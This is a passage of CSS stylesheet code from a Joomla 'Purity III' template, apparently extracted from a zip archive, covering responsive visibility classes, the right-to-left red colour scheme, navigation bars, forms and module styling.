  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
  border: 1px solid #ffffff;
  border-radius: 10px;
}
.carousel-indicators .active {
  width: 12px;
  height: 12px;
  margin: 0;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  left: 15%;
  bottom: 20px;
  right: 15%;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -10px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-right: -10px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-left: -10px;
  }
  .carousel-caption {
    left: 20%;
    right: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-header:before,
.modal-header:after,
.modal-footer:before,
.modal-footer:after {
  display: table;
  content: " ";
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-header:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
.pull-right {
  float: left !important;
}
.pull-left {
  float: right !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table !important;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table !important;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table !important;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table !important;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table !important;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKӜ�\�EG� Z Z#purity_iii/css/rtl/red/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: right;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #cc0000;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #800000;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: right;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #cc0000;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: right;
}
.text-right {
  text-align: left;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-right: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-right: 0;
  list-style: none;
}
.list-inline {
  padding-right: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-right: 5px;
  padding-left: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-right: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: right;
    width: 160px;
    clear: right;
    text-align: left;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-right: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    display: table;
    content: " ";
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-right: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-left: 15px;
  padding-right: 0;
  border-left: 5px solid #eeeeee;
  border-right: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: left;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:focus,
.btn-inverse.focus {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #000000;
}
.btn-inverse:hover {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  background-image: none;
  border-color: #191919;
}
.btn-inverse:active:hover,
.btn-inverse.active:hover,
.open > .dropdown-toggle.btn-inverse:hover,
.btn-inverse:active:focus,
.btn-inverse.active:focus,
.open > .dropdown-toggle.btn-inverse:focus,
.btn-inverse:active.focus,
.btn-inverse.active.focus,
.open > .dropdown-toggle.btn-inverse.focus {
  color: #ffffff;
  background-color: #191919;
  border-color: #000000;
}
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-right: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-left: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-right: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-right-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-right-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #cc0000;
  border-bottom-color: #cc0000;
}
.nav a:hover .caret {
  border-top-color: #800000;
  border-bottom-color: #800000;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-right: 0;
  padding-left: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  display: table;
  content: " ";
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: right;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
}
@media screen and (min-width: 768px) {
  .counter {
    float: left;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  left: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #cc0000;
  border-color: #b30000;
}
.navbar-default .navbar-text {
  color: #ffcccc;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-right: 30px;
  }
}
.navbar-default .navbar-nav > li > a,
.navbar-default .navbar-nav > li > span {
  color: #ffcccc;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a,
  .navbar-default .navbar-nav > li > span {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > span:hover,
.navbar-default .navbar-nav > li > a:focus,
.navbar-default .navbar-nav > li > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > span:hover,
  .navbar-default .navbar-nav > li > a:focus,
  .navbar-default .navbar-nav > li > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > span,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > span:hover,
.navbar-default .navbar-nav > .active > a:focus,
.navbar-default .navbar-nav > .active > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > span,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > span:hover,
  .navbar-default .navbar-nav > .active > a:focus,
  .navbar-default .navbar-nav > .active > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #b30000;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #ffcccc;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #b30000;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #ffcccc;
  border-bottom-color: #ffcccc;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #b30000;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #990000;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffcccc;
    padding: 20px 30px 20px 20px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #990000;
    border-top: 1px solid #800000;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #800000;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-right: 40px;
  }
}
.navbar-default .navbar-link {
  color: #ffcccc;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #b30000;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-right: 0;
  padding-left: 0;
  float: right;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -20px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-left: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #b30000;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  right: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  left: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  display: table;
  content: " ";
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-right: 20px;
  padding-right: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-right: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-right: 0;
  margin-right: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #b30000;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    right: auto;
    left: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form .input-group-addon {
  align-items: center;
  display: flex;
  width: auto;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
#login-form button[class*=plg_system_webauthn_login_button] {
  align-items: center;
  color: #000;
  display: flex;
  max-height: unset;
  gap: 4px;
  width: 100%;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: left;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
